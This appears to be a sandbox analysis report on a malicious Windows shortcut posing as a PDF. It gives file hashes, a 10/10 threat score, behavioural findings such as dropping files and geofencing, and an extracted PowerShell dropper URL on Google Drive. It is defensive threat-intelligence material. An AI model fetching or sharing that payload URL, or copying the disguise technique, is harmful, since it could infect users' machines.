Overview

overview

10

Static

static

1

ovJu9rmRU4W9y.pdf.lnk

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    ovJu9rmRU4W9y.pdf.lnk

  • Size

    3KB

  • Sample

    240126-tlpnwshdc9

  • MD5

    8f524aef0771d921ab1df779337a48b0

  • SHA1

    307e0fc5316bd346046e7248b737f21abd426024

  • SHA256

    93101ad1d5c18033ba802143a1321b8e378412d4f34846d4f68eb8024b779691

  • SHA512

    41cdfad40c41c295af46f551c381da709ea7d87846be859f61014fe34f3bc80da3c5c2580be3eee1de517e72bc3695cf42b53afb226de151821fadb912d87911

Score
10/10
linkpdf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u

Targets

    • Target

      ovJu9rmRU4W9y.pdf.lnk

    • Size

      3KB

    • MD5

      8f524aef0771d921ab1df779337a48b0

    • SHA1

      307e0fc5316bd346046e7248b737f21abd426024

    • SHA256

      93101ad1d5c18033ba802143a1321b8e378412d4f34846d4f68eb8024b779691

    • SHA512

      41cdfad40c41c295af46f551c381da709ea7d87846be859f61014fe34f3bc80da3c5c2580be3eee1de517e72bc3695cf42b53afb226de151821fadb912d87911

    Score
    10/10
    linkpdf

    • Blocklisted process makes network request

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks